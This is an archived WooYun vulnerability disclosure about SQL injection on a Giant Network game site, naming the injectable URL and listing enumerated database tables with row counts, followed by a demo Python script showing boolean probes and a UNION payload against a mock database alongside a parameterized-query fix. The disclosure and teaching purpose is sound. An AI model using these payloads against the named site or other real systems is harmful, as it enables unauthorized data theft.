
Vulnerability summary

Defect ID: wooyun-2015-0142723

Title: SQL injection in a 巨人网络 (Giant Network) site can expose a large amount of data

Vendor: 巨人网络 (Giant Network)

Author: 路人甲

Submitted: 2015-09-22 11:03

Fixed: 2015-11-08 10:58

Published: 2015-11-08 10:58

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-09-22: Details sent to the vendor, awaiting vendor action
2015-09-24: Vendor confirmed; details visible to the vendor only
2015-10-04: Details disclosed to core white hats and domain experts
2015-10-14: Details disclosed to regular white hats
2015-10-24: Details disclosed to intern white hats
2015-11-08: Details disclosed to the public

Brief description:

SQL injection in a 巨人网络 site; 7,000,000+ rows of data exposed

Detailed description:

Injection point:
http://gszt2.ztgame.com/article.php?aid=978493&s=19

[screenshot: QQ20150922-1@2x.png]

[screenshot: QQ20150922-2@2x.png]

Per-table row counts enumerated through the injection point:

Database: act_zt2
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| zxcjv3_visitlog | 7804347 |
| dp_record | 7012769 |
| dp_msg | 2015086 |
| zxcjv3_logs | 1790487 |
| wechat_0818_forward_log | 765980 |
| wechat_0818_draw_log_mz | 653788 |
| wechat_0818_user | 644640 |
| zxcjv3_user | 500487 |
| fr_sendlog_mycard | 394684 |
| wechat_0818_openid_error | 369929 |
| frv2_sendlog_mycard | 359527 |
| dds_play_log | 208769 |
| hb_user | 197055 |
| dds_user | 153518 |
| child_logs | 113627 |
| wanyouxi_user | 92383 |
| yyl_logs | 91152 |
| lb_user | 90779 |
| bz_logs | 77295 |
| commander_logs | 74674 |
| child_user | 66259 |
| shuang_user | 63794 |
| wechat_0818_draw_log | 51105 |
| bz_user | 48966 |
| chinaip | 46287 |
| wanyouxi_logs | 44800 |
| shuang_item_log | 41163 |
| card_log_2030 | 41056 |
| shouji_user | 22883 |
| haoshengyin_votes | 19849 |
| yyl_user | 18859 |
| `4y_review` | 6763 |
| dds_invite_log | 6735 |
| wj_vote | 6345 |
| dahao_member | 5200 |
| sword_user | 4885 |
| dds_share_log | 4685 |
| sword_vote_log | 3926 |
| waigua_jubao | 3755 |
| article | 2658 |
| zxcjv3_cards | 2460 |
| the9_review | 1835 |
| wj_review | 1603 |
| reason | 739 |
| upload | 203 |
| haoshengyin | 131 |
| dahao_team | 130 |
| reward_user | 96 |
| commander | 68 |
| dp_province | 35 |
| basicdata | 20 |
| zxcjv3_items | 12 |
| lotto_gift_type | 8 |
| sword_vote_info | 8 |
| dp_point | 6 |
| reward_act | 6 |
| wechat_0818_item | 6 |
| hb_items | 5 |
| catalogue | 4 |
| commander_lucky | 4 |
| of_info | 3 |
| wj0612_vote | 3 |
| dp_logs | 2 |
| wj0612_review | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 774 |
| STATISTICS | 216 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| KEY_COLUMN_USAGE | 99 |
| TABLES | 98 |
| TABLE_CONSTRAINTS | 95 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 6 |
| SCHEMATA | 3 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+


[screenshot: QQ20150922-3@2x.png]

Proof of vulnerability:

Proven (see the database and row-count enumeration above).

Remediation:

Filter and validate the request parameters; the robust fix is to stop splicing them into the SQL text and use prepared statements (parameterized queries) instead.
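As an added example (not code from the report, from 巨人网络, or from the site itself), the following Python script models the bug class behind an endpoint like article.php?aid=...&s=...: a handler that splices the two parameters into the SQL string, the boolean-based true/false probe that confirms the injection point, a UNION payload of the kind that lets a tool enumerate other tables, and a hardened handler with type validation plus bound parameters that rejects the same inputs. It uses an in-memory sqlite3 database with constructed tables and rows (`article`, `zxcjv3_user`, their columns and contents are all assumptions for the demo); the site's real server language, database engine and schema are not known from the report beyond the table names listed above.

```python
import sqlite3

# Added example: in-memory sqlite3 stand-in for the site's database.
# Table columns and rows are constructed for the demo; only the table
# names echo the report's listing.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE article (aid INTEGER PRIMARY KEY, s INTEGER, title TEXT);
        INSERT INTO article VALUES (978493, 19, 'demo article');
        CREATE TABLE zxcjv3_user (id INTEGER PRIMARY KEY, name TEXT, pw TEXT);
        INSERT INTO zxcjv3_user VALUES (1, 'alice', 'secret-hash');
        """
    )
    return conn


def article_vulnerable(conn, aid: str, s: str) -> list:
    """The bug class: request parameters spliced straight into SQL text."""
    sql = f"SELECT title FROM article WHERE aid={aid} AND s={s}"
    return [row[0] for row in conn.execute(sql)]


def article_fixed(conn, aid: str, s: str) -> list:
    """Hardened handler: enforce the numeric type, then bind as parameters."""
    if not (aid.isdigit() and s.isdigit()):
        raise ValueError("aid and s must be decimal integers")
    sql = "SELECT title FROM article WHERE aid=? AND s=?"
    return [row[0] for row in conn.execute(sql, (int(aid), int(s)))]


def _call(handler, conn, aid: str, s: str):
    """Run a handler; a rejected request is reported as None."""
    try:
        return handler(conn, aid, s)
    except ValueError:
        return None


def boolean_probe(handler, conn) -> bool:
    """Boolean-based blind check on the aid parameter.

    If appending a true condition leaves the response unchanged while a
    false condition changes it, the input reaches the SQL engine unescaped.
    """
    base = _call(handler, conn, "978493", "19")
    with_true = _call(handler, conn, "978493 AND 1=1", "19")
    with_false = _call(handler, conn, "978493 AND 1=2", "19")
    return base is not None and base == with_true and with_true != with_false


def union_extract(conn) -> list:
    """UNION payload: pull rows from another table through the same point.

    The trailing '--' comments out the rest of the original WHERE clause,
    so the second SELECT's single column lines up with 'title'.
    """
    payload = "978493 UNION SELECT name || ':' || pw FROM zxcjv3_user --"
    return article_vulnerable(conn, payload, "19")


if __name__ == "__main__":
    db = build_db()
    print("vulnerable handler injectable:", boolean_probe(article_vulnerable, db))
    print("fixed handler injectable:     ", boolean_probe(article_fixed, db))
    print("rows pulled via UNION:", union_extract(db))
    print("fixed handler, normal request:", article_fixed(db, "978493", "19"))
```

Run it directly to see the four results. The probe treats a rejected request as a non-match, so the hardened handler is reported as not injectable, while the vulnerable one both passes the true/false check and leaks the `zxcjv3_user` row through the UNION.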

Copyright notice: when republishing, credit the source as 路人甲@乌云


Vendor response

Vendor reply:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-09-24 10:57

Vendor comment:

Thank you, we have received this and are currently handling it; thanks for the prompt report.

Latest status:

None yet